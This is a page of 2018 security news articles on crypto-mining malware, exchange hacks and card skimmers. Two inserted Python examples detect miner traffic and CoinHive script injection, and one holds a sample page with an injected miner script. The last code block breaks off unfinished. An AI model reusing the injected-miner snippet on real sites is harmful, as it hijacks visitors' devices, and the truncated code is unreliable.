- Cryptocurrency -
Last update 09.10.2017 13:51:50
Crypto-Miners Slip Into Google Play
27.9.2018 securityweek Cryptocurrency
While Google doesn’t allow crypto-currency mining applications in Google Play, some developers have found a way to push such programs to the storefront: by hiding their true purpose.
For more than a year, malicious crypto-mining has spiked globally, fueled by massive increases in crypto-currency prices, and mobile users weren’t spared either, especially those on Android, the more popular mobile operating system at the moment.
Recently, SophosLabs security researchers discovered no less than 25 crypto-mining applications in Google’s official application store for Android, and revealed that over 120,000 users might have downloaded and installed them. The programs are disguised as games, utilities and educational apps.
With only a few lines of code, mining capabilities can be added to any app that uses a WebView embedded browser, the researchers note.
“Monero has been the authors’ choice of crypto-currency for all these apps as it offers sufficient privacy to keep the source, destination, and the amount mined hidden. These apps use CPU throttling to limit CPU usage by mining, and thus avoid the usual pitfalls: device overheating, high battery drain, and overall device sluggishness,” SophosLabs explains.
Of the 25 applications, 11 were found to be preparation apps for standardized tests in the United States, such as the ACT, GRE, or SAT. Published by a single developer account (Gadgetium), the apps contain an HTML page that implements the Coinhive-based miner.
One of the applications (de.uwepost.apaintboxforkids) was using the popular open-source CPU miner XMRig, which was designed to mine several crypto-currencies, Monero included.
Google was notified of the behavior of these applications in August and has already removed some of them, but many remain available for download in Google Play.
Japan Digital Currency Exchange Hacked, Losing $60 Million
22.9.2018 securityweek Cryptocurrency
TOKYO (AP) — Hackers have stolen 6.7 billion yen ($60 million) worth of cryptocurrencies from a Japanese digital currency exchange, the operators said Thursday.
Tech Bureau Corp. said a server for its Zaif exchange was hacked for two hours last week, and some digital currencies got unlawfully relayed from what's called a "hot wallet," or where virtual coins are stored at such exchanges.
The exchange was taken offline until details of the damage could be confirmed, and efforts were underway to get it back working, Tech Bureau said.
Japan has been bullish on virtual money and has set up a system requiring exchanges to be licensed to help protect consumers. The system is also meant to make Japan a global leader in the technology. Bitcoin has been a legal form of payment in Japan since April 2017, and a handful of major retailers here already accept bitcoin payments.
But the recurrence of cryptocurrency heists shows problems persist.
Earlier this year, the Tokyo-based exchange Coincheck reported a 58 billion yen ($547 million) loss of a cryptocurrency called NEM from suspected criminal hacking.
Coincheck, in operation since 2012, had been applying for a government license but had not yet gotten one. That led to industry-wide soul-searching, led by government financial regulators, to prevent such problems.
Zaif got registered with the government last year.
The company said Thursday it had accepted a 5 billion yen ($45 million) offer from Fisco, a Tokyo-based investment company, for a majority stake in Tech Bureau, headquartered in Osaka.
The cryptocurrencies stolen in last week's hack included Bitcoin and Monacoin. Of the stolen money, 2.2 billion yen ($20 million) belonged to the company, and the rest were customers' assets, according to Tech Bureau.
Earlier this year, a glitch at Zaif allowed some people to buy cryptocurrencies for zero yen.
Hackers stole $60 Million worth of cryptocurrencies from Japanese Zaif exchange
21.9.2018 securityaffairs Cryptocurrency
Cybercriminals have stolen 6.7 billion yen ($60 million) worth of cryptocurrencies from the Japanese digital currency exchange Zaif.
According to the Tech Bureau Corp., a Japanese cryptocurrency firm, hackers have compromised its Zaif exchange and have stolen 6.7 billion yen ($60 million) worth of cryptocurrencies, including Bitcoin, Monacoin, and Bitcoin Cash.
The stolen digital currencies included roughly 2.2 billion yen that belonged to Tech Bureau and 4.5 billion yen that belonged to its clients.
The hackers took control of the exchange for a couple of hours on Sept. 14 and illegally transferred coins from the exchange’s “hot wallet” to wallets under their control.
“Japanese cryptocurrency firm Tech Bureau Corp said about $60 million in digital currencies were stolen from its exchange, highlighting the industry’s vulnerability despite recent efforts by authorities to make it more secure.” Reuters reported.
Three days later, operators at the exchange noticed server problems and publicly disclosed the hack on Sept. 18.
Tech Bureau took the exchange offline and sold majority ownership to Fisco Ltd in exchange for a 5 billion yen ($44.59 million) investment that would be used to replace the digital currencies stolen from client accounts.
“Documents seen by Reuters on Thursday showed Japan’s Financial Services Agency would conduct emergency checks on cryptocurrency exchange operators’ management of customer assets, following the theft. FSA officials were not immediately available for comment.” Reuters continues.
This is the second hack suffered by a Japanese crypto exchange this year: in January the Japan-based digital exchange Coincheck was hacked and crooks stole $530 million in digital coins.
Earlier this year, a problem at the Zaif exchange allowed some people to buy cryptocurrencies without paying.
Japan is considered a global leader in cryptocurrency technologies; Bitcoin has been accepted as a means of payment in the country since April 2017, and major retailers accept such payments.
Experts believe that the cyber heist will affect the FSA’s ongoing regulatory review of the cryptocurrency industry.
Last year Japan became the first country to regulate cryptocurrency exchanges: they have to register with the FSA and comply with reporting and other obligations.
In any case, the incidents demonstrate that the security of exchanges has to be improved.
NSA Leak Fuels Rise in Hacking for Crypto Mining: Report
20.9.2018 securityweek Cryptocurrency
Illicit cryptocurrency mining has been surging over the past year, in part due to a leaked software tool from the US National Security Agency, researchers said Wednesday.
A report by the Cyber Threat Alliance, an association of cybersecurity firms and experts, said it detected a 459 percent increase in the past year of illicit crypto mining -- a technique used by hackers to steal the processing power of computers to create cryptocurrency.
"Activity has gone from a virtually non-existent issue to one that almost universally shows up at the top of our members' threat lists," said a blog post by Neil Jenkins, chief analytic officer for the alliance.
One reason for the sharp rise was the leak last year by a group of hackers known as the Shadow Brokers of "EternalBlue," software developed by the NSA to exploit vulnerabilities in the Windows operating system.
"A patch for EternalBlue has been available for 18 months and even after being exploited in two significant global cyberattacks -- WannaCry and NotPetya -- there are still countless organizations that are being victimized by this exploit, as it's being used by mining malware," Jenkins wrote.
The rise in hacking coincides with growing use of virtual currencies such as bitcoin, ethereum or monero, which are not regulated by any government and are created through solving complex computing problems.
While some cryptocurrency mining is legitimate, hackers have discovered ways to tap into the processing power of unsuspecting computer users to illicitly generate currency.
Jenkins said the rise in malware for crypto mining highlights broader cybersecurity threats.
"Illicit mining is the 'canary in the coal mine' of cybersecurity threats," he said. "If illicit cryptocurrency mining is taking place on your network, then you most likely have worse problems and we should consider the future of illicit mining as a strategic threat."
Hackers can generate gains and use cryptocurrency for other malicious purposes such as purchasing other kinds of malware tools on the "dark web," according to the report.
The researchers said 85 percent of illicit cryptocurrency malware mines monero, with bitcoin representing eight percent.
"Although monero is significantly less valuable than bitcoin, several factors make this the cryptocurrency of choice for malicious actors," the report said.
Monero, according to the report, offers more privacy and anonymity, "which help malicious actors hide both their mining activities and their transactions using the currency," the researchers said.
"Transaction addresses and values are obfuscated by default, making tracking monero incredibly difficult for investigators."
MagentoCore skimmer already infected 7,339 Magento stores
4.9.2018 securityaffairs Cryptocurrency
The MagentoCore skimmer has already infected 7,339 Magento stores; according to Willem de Groot, who uncovered the campaign, it is the most aggressive to date.
The cybersecurity researcher Willem de Groot has uncovered a massive hacking campaign aimed at Magento stores. The hackers have already infected 7,339 Magento stores with a skimmer script, dubbed MagentoCore, that siphons payment card data from users who purchased on the sites.
Threat actors behind this campaign managed to compromise the websites running Magento and injected the payment card scraper in its source code.
Crooks attempt to access the control panel of Magento stores with brute-force attacks.
At the time of writing, querying the PublicWWW service we can verify that the MagentoCore script is currently deployed on 5,214 domains.
The malicious script loads on store checkout pages, steals the payment card details entered by users and sends them to a server controlled by the attacker.
Willem de Groot reported that the hacking campaign involves a skimmer script loaded from the magentocore.net domain.
“A single group is responsible for planting skimmers on 7339 individual stores in the last 6 months. The MagentoCore skimmer is now the most successful to date.” de Groot wrote in a blog post.
MagentoCore credit card stealer Reinfector
The expert found the MagentoCore script on 7,339 Magento stores in the past six months; the campaign is still ongoing, and hackers are compromising new Magento stores at a pace of 50 to 60 sites per day.
“The average recovery time is a few weeks, but at least 1450 stores have hosted the MagentoCore.net parasite during the full past 6 months,” de Groot says. “New brands are hijacked at a pace of 50 to 60 stores per day.” continues the expert.
This script records keystrokes from customers and sends them to “magentocore.net” server.
The expert noticed that the malware implements a recovery mechanism: in the case of the Magento software, it adds a backdoor to cron.php that periodically downloads the malicious code and, after running it, deletes itself.
“The victim list contains multi-million dollar, publicly traded companies, which suggests the malware operators make a handsome profit,” de Groot added.
“But the real victims are eventually the customers, who have their card and identity stolen.”
According to Bleeping Computer, which quoted Yonathan Klijnsma, Threat Researcher Lead at RiskIQ, the MagentoCore campaign is actually part of a larger card-scraping campaign known as MageCart that has been active since late 2015.
According to de Groot, currently, 4.2% of all Magento stores are infected with one or more skimmer scripts.
Willem de Groot
http://MagentoCore.net skimmer planted on 7337 stores; removes competing skimmers; periodically resets admin passwords to "how1are2you3" https://gwillem.gitlab.io/2018/08/30/magentocore.net_skimmer_most_aggressive_to_date/ …
12:58 PM - Aug 30, 2018 · The Hague, The Netherlands
Willem de Groot
4.2% of all Magento stores globally are currently leaking payment and customer data
2:55 PM - Aug 27, 2018
Cryptocurrency Platform Atlas Quantum hacked, 260k users impacted
29.8.2018 securityaffairs Cryptocurrency
The Cryptocurrency Platform Atlas Quantum suffered a security breach, information belonging to more than 260,000 users was stolen by hackers.
Hackers stole information related to over 260,000 users of the Cryptocurrency Platform Atlas Quantum. Exposed data includes customer names, phone numbers, and email addresses, as well as customer account balances.
The platform lets users trade the cryptocurrency in their accounts on multiple platforms, maximizing profits through its automated arbitrage system.
Atlas has over 240,000 users and manages over $30 million in assets.
The company disclosed the security breach in a post on Facebook, saying it discovered the incident on Sunday evening. Atlas claims that the hackers did not steal users’ funds; they only compromised the platform’s database.
“We would like to point out that this is not a steal of bitcoins in custody or violation of our accounts in the exchanges. However, our customer base was exposed,” said Chief Executive Officer Rodrigo Marques in the Facebook post. “At the time of the incident, we took immediate steps to protect the database and passwords and private keys remain encrypted.”
Cryptocurrency Platform Atlas Quantum
The company said it immediately adopted the measures necessary to protect the database.
The company immediately launched an investigation, which is still ongoing, and temporarily disabled some features.
“Some features of the platform have been temporarily disabled, as a precaution, since we need to ensure security. We will notify you when they are reactivated,” Atlas added.
The well-known cybersecurity expert Troy Hunt, who operates HaveIBeenPwned, announced that he had already added 24% of the 261k records to his data breach notification service.
Users of the Atlas Quantum cryptocurrency platform can check whether their accounts and passwords have been compromised through the HaveIBeenPwned service.
The incident demonstrates that cryptocurrency marketplaces are becoming privileged targets for hackers.
Hackers Breach Cryptocurrency Platform Atlas Quantum
29.8.2018 securityweek Cryptocurrency
260,000 Impacted in Cryptocurrency Investment Platform Breach
The information of over 260,000 users was stolen after hackers managed to compromise the cryptocurrency investment platform Atlas Quantum.
Through this platform, users can add Bitcoin to their accounts and make profits by trading the cryptocurrency on various platforms. Atlas says it uses an automated arbitrage system to yield profits for customers based on real-time movements in the cryptocurrency market.
The company says it has over 240,000 users in more than 50 countries and over $30 million in assets under its management. In 2017, the platform delivered a cumulative 38% return to investors, Atlas claims.
In an announcement made on Facebook, the company revealed that it became aware of a data breach on Sunday evening and that, although no funds were stolen, its customer database was compromised.
According to a tweet from HaveIBeenPwned, the service that allows users to check whether their accounts and passwords have appeared in any data breaches, the stolen data set had over 261,000 entries.
The leaked information apparently includes affected individuals’ names, phone numbers, and email addresses, as well as their account balances.
“At the time of the incident, we took immediate steps to protect the database and passwords and private keys remain encrypted,” Atlas says.
The investigation into the incident is ongoing, but the company also notes that, in addition to monitoring the affected accounts, they are working to add more protections against fraud.
“Some features of the platform have been temporarily disabled, as a precaution, since we need to ensure security. We will notify you when they are reactivated,” Atlas says.
“The Atlas Quantum data breach suggests that crypto services remain a high-profile target for hackers. Even those who do not actively use the platform to store or invest in crypto may have had their personal data exposed,” Bitglass CTO Anurag Kahol told SecurityWeek in an emailed comment.
“For companies like Atlas, that store mass amounts of user data, reputation and user data security are closely tied. Quickly identifying the cause of this breach and mitigating the threat of further data loss is a critical next step for Atlas and prevention should be top of mind for all companies that store high-value data,” Kahol continued.
The incident should be a wakeup call for cryptocurrency platforms, which are increasingly targeted by cybercriminals, Jonathan Bensen, Director of Product Management/ Acting CISO, Balbix, pointed out to SecurityWeek in an emailed commentary.
Group-IB: The Shadow Market Is Flooded with Cheap Mining Software
10.8.2018 securityaffairs Cryptocurrency
Group-IB is recording new outbreaks of illegal mining (cryptojacking) threats in the networks of commercial and state organizations.
Group-IB, an international company specializing in the prevention of cyberattacks, is recording new outbreaks of illegal mining (cryptojacking) threats in the networks of commercial and state organizations. According to Group-IB’s Threat Intelligence, over a year, the number of shadow-forum ads offering mining software has increased fivefold (H1 2018 vs H1 2017). Group-IB experts say it is a very dangerous tendency to have so many mining Trojans available designed to use other people’s devices and infrastructure for illegitimate generation of cryptocurrency.
Cryptojacking (using computation capacity of a computer or infrastructure for cryptocurrency mining without the knowledge or consent of its owner) is still a comparatively popular method of personal gain, in spite of a clear tendency toward a decrease in the number of incidents of this type of fraud. Growth in the number of such thefts may be caused not only by the growth of mining software offers in Darknet but also by their comparatively low price, which is often less than $0.50.
The low entry barrier to the illegal mining market results in a situation where cryptocurrency is being mined by people without technical expertise or experience with fraudulent schemes. When they gain access to simple tools for making money off hidden cryptocurrency mining, they don’t consider it a crime, all the more so as the Russian legislative environment still leaves enough loopholes to avoid prosecution for such thefts. There are still very few arrests and cases of prosecution for cryptojacking.
One cryptocoin after another: what are the dangers of mining?
Any device (computer, smartphone, IoT, server, etc.) may be used for cryptojacking: that’s why it is not enough to install detection systems only at the workstation level. New types of mining software appear regularly that bypass security systems based on signature alone. A symmetric response to this threat is the analysis of various mining manifestations at the network level. With this end in view, it is necessary to use, among other things, behavioral analysis technologies to detect previously unknown programs and tools.
Group-IB experts warn that mining results not just in direct financial losses due to increased expenditures for electricity. It threatens the stability and continuity of business processes by decelerating corporate systems and increasing depreciation of hardware. Infection of infrastructure with a mining Trojan may result in the failure of corporate apps, networks and systems. Unauthorized external programs working without the knowledge of business owners is fraught with reputational losses, as well as compliance and regulatory risks.
What should we do?
Integrated countermeasures against cryptojacking require the detection of all forms of malicious code distributed or running in the network, based on a regularly updated database of threats to systems (Threat Intelligence class). Suspicious activity should always be analyzed in a secure, isolated environment to ensure the absolute confidentiality of data about infected computers, infrastructure segments and other resources. It is important not only to protect yourself within your own network, but also to detect cryptomining tools running JavaScript on hacked resources that seek to infect as many victims as possible. One more type of fraud has been gaining popularity recently: the use of traditional insiders. Companies should be able to protect themselves against their own dishonest employees who attempt to increase their incomes at the expense of their employer’s resources.
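The network-level detection this section calls for, as an added example (not Group-IB's code): a Python detector that flags internal hosts speaking the Stratum mining protocol. Stratum is not named on this page; it is assumed here as the pool protocol used by XMRig-style miners mentioned elsewhere on the page, and the flow records below are constructed, with a placeholder wallet.

```python
import json

# JSON-RPC method names of the Stratum mining protocol, which CPU miners such as
# XMRig use to talk to a pool (assumption of this example; the page names only
# the miners). A workstation speaking Stratum is a strong cryptojacking signal,
# whatever port or binary produced the traffic.
CRYPTONOTE_METHODS = {"login", "submit", "keepalived", "getjob"}   # Monero pools
STRATUM_V1_METHODS = {"mining.subscribe", "mining.authorize",      # Bitcoin-style
                      "mining.submit", "mining.notify"}


def classify_payload(payload):
    """Return (method, agent) if `payload` is a Stratum message, else None."""
    try:
        msg = json.loads(payload)
    except ValueError:
        return None
    if not isinstance(msg, dict):
        return None
    method = msg.get("method")
    params = msg.get("params")
    if method in STRATUM_V1_METHODS:
        agent = None
        if (method == "mining.subscribe" and isinstance(params, list)
                and params and isinstance(params[0], str)):
            agent = params[0]
        return method, agent
    if method in CRYPTONOTE_METHODS and isinstance(params, dict):
        # "login" and "submit" are generic RPC names; require the pool message
        # shape (wallet in "login"/"pass", share with "job_id") to limit false positives.
        if method == "login" and not ("login" in params and "pass" in params):
            return None
        if method == "submit" and "job_id" not in params:
            return None
        return method, params.get("agent")
    return None


def detect_miners(records):
    """records: iterable of "src dst tcp_payload" flow lines (see SAMPLE_RECORDS).
    Returns {src_host: {"methods", "agents", "pools"}} for hosts that spoke
    Stratum, giving the analyst an internal host to isolate and a pool to block."""
    hits = {}
    for line in records:
        try:
            src, dst, payload = line.split(" ", 2)
        except ValueError:
            continue
        result = classify_payload(payload)
        if result is None:
            continue
        method, agent = result
        host = src.rsplit(":", 1)[0]
        entry = hits.setdefault(host, {"methods": set(), "agents": set(), "pools": set()})
        entry["methods"].add(method)
        if agent:
            entry["agents"].add(agent)
        entry["pools"].add(dst)
    return hits


# Constructed sample flow records (not real traffic): "src dst tcp_payload".
SAMPLE_RECORDS = [
    '10.0.0.5:51234 203.0.113.10:3333 {"id":1,"jsonrpc":"2.0","method":"login",'
    '"params":{"login":"WALLET_PLACEHOLDER","pass":"x","agent":"XMRig/2.6.4"}}',
    '10.0.0.5:51234 203.0.113.10:3333 {"id":2,"jsonrpc":"2.0","method":"submit",'
    '"params":{"id":"1","job_id":"job1","nonce":"deadbeef","result":"00"}}',
    '10.0.0.7:40000 198.51.100.20:443 {"id":1,"method":"mining.subscribe",'
    '"params":["cpuminer/2.5.0"]}',
    '10.0.0.9:55000 192.0.2.30:80 GET /index.html HTTP/1.1',
    '10.0.0.9:55001 192.0.2.31:443 {"jsonrpc":"2.0","method":"login",'
    '"params":{"username":"alice","token":"t"}}',
]

if __name__ == "__main__":
    for host, info in detect_miners(SAMPLE_RECORDS).items():
        print(host, sorted(info["methods"]), sorted(info["agents"]), sorted(info["pools"]))
```

Because the check keys on message shape rather than destination port, a miner pointed at a pool on 443 (the second sample host) is still caught.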
Group-IB experts record a massive surge of user data leaks form cryptocurrency exchanges
7.8.2018 securityaffairs Cryptocurrency
Group-IB researchers have investigated user data leaks from cryptocurrency exchanges and analyzed the nature of these incidents.
Security experts from Group-IB, an international company specializing in preventing cyberattacks and developing information security solutions, have investigated user data leaks from cryptocurrency exchanges and analyzed the nature of these incidents. Within a year, the number of data leaks soared by 369%.
The USA, Russia and China are TOP-3 countries in which registered users became the victims of cyberattacks.
In 2017, when cryptocurrencies were gaining momentum, their record-breaking capitalization and a spike in Bitcoin’s exchange rate led to dozens of attacks on cryptocurrency services. Based on data obtained from the Group-IB Threat Intelligence (cyber intelligence) system, experts from the international company Group-IB have analyzed the theft of 720 user accounts (logins and passwords) from the 19 largest cryptocurrency exchanges.
January holidays for hackers: a 689% surge in the number of leaks
The report «2018 Cryptocurrency Exchanges. User Accounts Leaks Analysis» shows a steady increase in the number of compromised user accounts on cryptocurrency exchanges. In 2017, their number increased by 369% compared to 2016. The first month of 2018 set a record: due to growing interest in cryptocurrencies and the blockchain industry, in January the number of incidents jumped by 689% compared to the 2017 monthly average. The USA, Russia, and China are the countries where users are targeted most often. The study has shown that every third victim of the attack is located in the United States.
Toolkit and infrastructure used for attacks
Experts of Group-IB have identified 50 active botnets used for launching cyberattacks on cryptocurrency exchanges users. The infrastructure used by cybercriminals is mainly based in the USA (56.1%), the Netherlands (21.5%), Ukraine (4.3%) and Russia (3.2%).
The attackers use an increasingly wide range of malicious software and update their tools on a regular basis. The most frequently used malicious software includes Trojans such as AZORult and Pony Formgrabber, as well as the Qbot. At the same time, cybercriminals have modified tools previously used for attacks on banks and now successfully use them to hack cryptocurrency exchanges and gain access to users’ personal data.
What makes a successful attack possible?
This is one of the key issues covered in the Group-IB report. The answer is actually quite simple: disregard for information security and underestimating the capabilities of cybercriminals. The first and main cause is that both users and exchanges omit to use two-factor authentication. The second cause is disregard for basic security rules such as the use of complex and unique passwords.
Group-IB has analyzed 720 accounts and found that one out of five users chose a password shorter than 8 characters (see Figure).
Attack as a premonition
Experts of Group-IB draw a bleak conclusion: currently no cryptocurrency exchange, regardless of its size and track record, can guarantee absolute security to its users. At least 5 out of 19 exchanges in question fell victim to targeted cyberattacks widely covered by the media. These are Bitfinex, Bithumb, Bitstamp, HitBTC, Poloniex and, presumably, Huobi. There are various attack vectors: errors in the source code of the software, phishing attacks, unauthorized access to the user database, vulnerabilities related to storage and withdrawal of funds. However, all of them stem from the lack of attention to information security and protection of digital assets.
“Increased fraudulent activity and attention of hacker groups to cryptoindustry, additional functional of malicious software related to cryptocurrencies, as well as the significant amounts of already stolen funds, signals that the industry is not ready to defend itself and protect its users”, says Ruslan Yusufov, the Director of Special Projects at Group-IB. “In 2018 we will see even more incidents. This situation requires prompt and effective response of all stakeholders, including experts in different areas.”
Recommendations of Group-IB experts to users and exchanges
In order to protect one’s funds against crypto-fraud, Group-IB recommends users to be mindful of their passwords (which should contain at least 14 unique symbols), never use the same passwords for different exchanges and always enable the 2FA (two-factor authentication). Experts recommend avoiding the use of public Wi-Fi (at least when carrying out exchange transactions) and paying special attention to one’s “traces” on the social media. For instance, users should not demonstrate the fact that they possess any cryptocurrency.
Recommendations to cryptoexchanges are also of high importance. First of all, they are strongly advised to make two-factor authentication obligatory for all the users and their operations, conduct regular security audits of IT infrastructure and related services, and allocate resources to training and awareness-raising concerning personnel security, starting from top management (founders) and down to rank-and-file employees. To improve the cybersecurity of cryptocurrency exchanges, experts also recommend installing Anti-APT solutions, using Threat Intelligence and implementing anti-fraud solutions, as well as behavioral analysis systems. Specialists also suggest preparing cybersecurity incident response plans which will minimize potential damage.
ZombieBoy, a new Monero miner that allows to earn $1,000 on a monthly basis
6.8.2018 securityaffairs Cryptocurrency
A security researcher discovered a new crypto mining worm dubbed ZombieBoy that leverages several exploits to evade detection.
The security researcher James Quinn has spotted a new strain of crypto mining worm dubbed ZombieBoy that appears to be very profitable and leverages several exploits to evade detection.
The expert called this new malware ZombieBoy because it uses a tool called ZombieBoyTools to drop the first DLL; it uses several exploits to spread.
Unlike MassMiner cryptocurrency miner, ZombieBoy leverages WinEggDrop instead of MassScan to search for new hosts to infect.
The miner uses Simplified Chinese, which suggests that its author is a Chinese coder.
The ZombieBoy miner leverages several exploits, including:
CVE-2017-9073, RDP vulnerability on Windows XP and Windows Server 2003
CVE-2017-0143, SMB exploit
CVE-2017-0146, SMB exploit
ZombieBoy also uses the NSA-linked exploits DoublePulsar and EternalBlue to remotely install the main DLL. The malware uses ZombieBoyTools to deploy the two exploits.
Once it has established a backdoor on the target system, it can deliver other families of malware, such as ransomware and keyloggers.
According to Quinn, the 64.exe module downloaded by ZombieBoy uses the DoublePulsar exploit to install both an SMB backdoor and an RDP backdoor.
The same component uses XMRig to mine Monero at 43 KH/s, which means the operators can earn about $1,000 per month at the current rate.
“In addition, 64.exe uses XMRIG to mine for XMR. Prior to shutting down one of its addresses on minexmr.com, ZombieBoy was mining at around 43KH/s. This would earn the attackers slightly over $1,000 per month at current Monero prices.” continues the analysis.
Quinn highlighted that the miner is being updated constantly; he is observing new samples on a daily basis.
The malware is able to detect virtual machines and does not run in a virtualized environment, in order to hinder its detection.
Further details including IoCs are reported in the analysis published by the expert.
MikroTik Routers Exploited in Massive Crypto-Mining Campaign
4.8.2018 securityweek Exploit Cryptocurrency
Attackers managed to infect tens of thousands of MikroTik network routers in Brazil with code that injects the CoinHive in-browser crypto-mining script into web traffic.
The attack emerged on July 31, when more than 70,000 MikroTik devices in the country started displaying the same behavior. With all using the same CoinHive site-key, it became apparent that a single actor was behind the attack.
No zero-day was used in this massive attack, as MikroTik, a Latvian router manufacturer, patched the targeted vulnerability back in April 2018. The issue, however, is that the vulnerable devices haven’t been updated in a timely manner.
At the moment, there are “hundreds of thousands of unpatched (and thus vulnerable) devices still out there, and tens of thousands of them are in Brazil alone,” Trustwave’s Simon Kenin, the researcher who analyzed the attack, reveals.
The employed exploit provides the attacker with the ability to read files from a vulnerable MikroTik router and get unauthenticated remote admin access to the device.
As part of this attack, however, the actor didn’t run a malicious executable on the router, but leveraged the device’s functionality to inject the CoinHive script into every web page the user visited.
For that, the attacker created a custom error page with the CoinHive script in it, which resulted in the user landing on that page when encountering any kind of error page while browsing. The attack works in both directions, meaning that users who visit websites behind those infected routers are impacted as well.
Initially, users would encounter the CoinHive script on every visited page, likely because the attacker, who appears to have high understanding of how the MikroTik routers work, might have built code to inject the script in every page.
In addition to modifying the device’s settings to serve the crypto-mining error page, the attacker also created a backdoor on the compromised devices. Kenin also noticed that the script has been updated several times during his investigation.
“The attacker seems to be adding more cleanup commands to leave a smaller footprint and reduce risk of being detected,” the researcher notes.
Kenin also noticed that, although the attack was initially focused on Brazil, MikroTik devices in other countries started being infected as well. In fact, he eventually discovered that over 170,000 routers globally appeared to have the CoinHive site-key.
By targeting MikroTik’s vulnerable carrier-grade router devices, the attackers ensured a broad reach: impacted are not only users behind the routers, but also the visitors of any website hosted behind such a router.
“There are hundreds of thousands of these devices around the globe, in use by ISPs and different organizations and businesses, each device serves at least tens if not hundreds of users daily,” Kenin points out.
While the routers were exploited to deliver a crypto-mining payload, the devices could have been exploited for other objectives, Sean Newman, Director of Product Management at Corero Network Security, told SecurityWeek. "From a DDoS perspective, the scale of processing power available in such devices could easily be leveraged for a single attack which could extend to tens of terabits per second, or many smaller attacks if they were used as part of a DDoS for hire service," Newman said.
Hundreds of thousands of MikroTik routers involved in massive Coinhive cryptomining campaign
3.8.2018 securityaffairs Cryptocurrency
Experts uncovered a massive cryptojacking campaign that is targeting MikroTik routers to inject a Coinhive cryptocurrency mining script in the web traffic.
Security experts have uncovered a massive cryptojacking campaign targeting MikroTik routers; the hackers change the configuration of the devices to inject a Coinhive cryptocurrency mining script into the users’ web traffic.
The campaign was first spotted by the researcher who goes online with the Twitter handle MalwareHunterBR.
another mass exploitation against @mikrotik_com devices (https://github.com/mrmtwoj/0day-mikrotik …)
1:31 PM - Jul 30, 2018
According to Catalin Cimpanu from Bleeping Computer, the campaign first started in Brazil, but it is rapidly expanding to other countries targeting MikroTik routers all over the world.
The same campaign was monitored by the experts at Trustwave, who confirmed that the campaign initially targeted MikroTik routers used by Brazilians.
“On July 31st, just after getting back to the office from my talk at RSA Asia 2018 about how cyber criminals use cryptocurrencies for their malicious activities, I noticed a huge surge of CoinHive in Brazil.” reads the report published by Trustwave.
“After a quick look I saw that this is not your average garden variety website compromise, but that these were all MikroTik network devices.”
The experts noticed that the compromised devices were all using the same CoinHive sitekey, most of them in Brazil, which means that they were targeted by the same attackers.
According to Trustwave the hackers were exploiting a zero-day flaw in the MikroTik routers to inject a copy of the Coinhive library in the traffic passing through the MikroTik router.
“Initial investigation indicates that instead of running a malicious executable on the router itself, which is how the exploit was being used when it was first discovered, the attacker used the device’s functionality in order to inject the CoinHive script into every web page that a user visited.” continues the analysis.
The vulnerability was discovered in April and patched by the vendor in just one day.
Technical details of the MikroTik flaw were publicly disclosed in May, and public proof-of-concept (PoC) code for the issue was published on GitHub.
Trustwave pointed out that many users who weren’t using MikroTik routers themselves were affected too, because Internet providers and big organizations use MikroTik routers that were compromised by the hackers.
The experts noticed that, once the threat actors realized they had been spotted by the researchers, they switched tactics and injected the Coinhive script only in error pages returned by the routers.
After the initial phase, the campaign targeted devices outside Brazil, and it has been estimated that roughly 170,000 MikroTik routers were compromised to inject the Coinhive script. The campaign could potentially compromise over a million MikroTik routers exposed on the Internet.
“The attacker wisely thought that instead of infecting small sites with few visitors, or finding sophisticated ways to run malware on end user computers, they would go straight to the source; carrier-grade router devices,” conclude the experts.
“Even if this attack only works on pages that return errors, we’re still talking about potentially millions of daily pages for the attacker.”
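The injection described in the Trustwave write-up above and in this article (one CoinHive site key served on error pages by many unrelated hosts) can be spotted from captured HTTP responses. The following is an added example, not code from Trustwave or Security Affairs; the hosts, URLs and site keys in it are constructed.

```python
"""Added example (not Trustwave's or Security Affairs' code): detect CoinHive
injection in captured HTTP responses and correlate site keys across hosts.
All hostnames, URLs and site keys below are constructed for illustration."""
import re
from typing import Dict, List, Optional, Set, Tuple
from urllib.parse import urlparse

# The CoinHive browser miner was loaded from this library URL ...
COINHIVE_LOADER = re.compile(
    r"https?://(?:www\.)?coinhive\.com/lib/coinhive\.min\.js", re.IGNORECASE)
# ... and started with a site key: new CoinHive.Anonymous('<site key>')
SITEKEY = re.compile(
    r"CoinHive\.(?:Anonymous|User)\(\s*['\"]([A-Za-z0-9]{16,64})['\"]",
    re.IGNORECASE)

Response = Tuple[str, int, str]  # (url, HTTP status, body)


def inspect_response(url: str, status: int, body: str) -> Optional[dict]:
    """Return a finding if the body carries the CoinHive loader or a site key."""
    has_loader = COINHIVE_LOADER.search(body) is not None
    key = SITEKEY.search(body)
    if not has_loader and key is None:
        return None
    return {
        "host": urlparse(url).hostname,
        "url": url,
        "status": status,
        "sitekey": key.group(1) if key else None,
        # The campaign moved to injecting only into error pages, so record
        # whether the miner turned up on an error response.
        "on_error_page": status >= 400,
    }


def shared_sitekeys(findings: List[dict]) -> Dict[str, Set[str]]:
    """Map each site key seen on more than one host to those hosts.

    A site owner mining on their own page yields one key on one host; the
    same key on unrelated hosts is the signature of upstream (router) injection.
    """
    by_key: Dict[str, Set[str]] = {}
    for f in findings:
        if f["sitekey"]:
            by_key.setdefault(f["sitekey"], set()).add(f["host"])
    return {k: hosts for k, hosts in by_key.items() if len(hosts) > 1}


def triage(responses: List[Response]) -> Tuple[List[dict], Dict[str, Set[str]]]:
    """Inspect every response and report site keys shared across hosts."""
    findings = [f for f in (inspect_response(*r) for r in responses) if f]
    return findings, shared_sitekeys(findings)


# Constructed site keys (not real CoinHive keys).
INJECTED_KEY = "CONSTRUCTEDsitekeyAAAAAAAAAAAAAA"
OWNER_KEY = "OwnerOperatedKeyBBBBBBBBBBBBBBBB"

# Constructed sample: an error page as a compromised router would serve it.
INJECTED_ERROR_PAGE = f"""<html><body><h1>404 Not Found</h1>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>var miner = new CoinHive.Anonymous('{INJECTED_KEY}');
miner.start();</script></body></html>"""

# A page whose owner runs the miner deliberately (one key, one host).
OWNER_MINING_PAGE = f"""<html><body><p>Support us by mining</p>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>new CoinHive.Anonymous('{OWNER_KEY}').start();</script>
</body></html>"""

SAMPLE_RESPONSES: List[Response] = [
    ("http://shop.example.net/", 200, "<html><body>Welcome</body></html>"),
    ("http://shop.example.net/missing", 404, INJECTED_ERROR_PAGE),
    ("http://news.example.org/old-post", 404, INJECTED_ERROR_PAGE),
    ("http://blog.example.com/", 200, OWNER_MINING_PAGE),
]

if __name__ == "__main__":
    findings, shared = triage(SAMPLE_RESPONSES)
    for f in findings:
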